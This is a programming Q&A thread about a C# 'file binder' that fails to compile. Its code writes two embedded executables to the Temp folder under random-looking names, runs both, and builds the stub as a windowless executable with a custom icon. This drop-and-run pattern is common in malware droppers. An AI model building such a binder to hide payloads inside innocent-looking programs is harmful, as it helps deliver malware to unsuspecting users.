# C# Can't access Properties.Resources

Tags: c#

so, I am making a file binder.
`saves1` and `saves2` are the embedded resources and
I want to extract it in the temp folder.

Here's my code:

```
using System.IO;
using System.Diagnostics;

namespace _123
{
class Program
{
    static void Main(string[] args)
    {
        string patdth = @"C:\Users\Alfred\AppData\Local\Temp";
        byte[] lel1 = Properties.Resources.saves2;
        byte[] lel = Properties.Resources.saves1;
        File.WriteAllBytes(patdth + "\\hdhtehyr.exe", lel);
        File.WriteAllBytes(patdth + "\\hdhdhdhgd.exe", lel1);
        Process.Start(patdth + "\\hdhtehyr.exe");
        Process.Start(patdth + "\\hdhdhdhgd.exe");


    }
  }
}
```

I get this error:

> "Error CS0103 The name 'Properties' does not exist in the current
>   context ConsoleApplication3".

edit:

I am inserting the resources dynamically here, as you can see my code "/resources" + Path" is my way of adding the resources.

```
        public void compile2(string file)
    {
        CodeDomProvider provider = CodeDomProvider.CreateProvider("CSharp");
        CompilerParameters compars = new CompilerParameters();
        compars.ReferencedAssemblies.Add("System.dll");
        compars.ReferencedAssemblies.Add("System.Reflection.dll");
        compars.ReferencedAssemblies.Add("System.IO.dll");
        compars.GenerateExecutable = true;
        compars.GenerateInMemory = false;
        compars.TreatWarningsAsErrors = false;
        compars.OutputAssembly = "Binded.exe";
        compars.CompilerOptions = "/resources:" + textBox10.Text;
        compars.CompilerOptions = "/resources:" + textBox11.Text;
        compars.CompilerOptions = "/t:winexe";
        if (string.IsNullOrWhiteSpace(textBox12.Text))
        {

        }
        else
        {
            compars.CompilerOptions = "/win32icon:" + textBox12.Text;
        }
        CompilerResults res = provider.CompileAssemblyFromSource(compars, file);
        {
            MessageBox.Show("Code compiled!", "Success");
        }
    }
```

Comment: Did you do this part? https://stackoverflow.com/questions/16656104/how-do-i-create-a-resources-file-for-a-console-application ?

Comment: You cannot save "embedded" resources directly because as the name indicates they are embedded in the assembly. Try the method in the following question: https://stackoverflow.com/questions/4405813/copying-embedded-resource-as-file-to-disk-in-c-sharp and to get the resource name automatically, you can use the accepted answer from: https://stackoverflow.com/questions/9555679/how-do-i-get-the-resource-name-from-the-resource-object

Comment: I did i think? actually i am using a method called "Dynamic compiling".

Answer (score 10, accepted):

Under 'ConsoleApplication3' Project, double click 'Properties' -> Select 'Resources' tab -> Click on "This project does not contain a default resources file. Click here to create one." message. Add the files ('saves1' and 'saves2') here.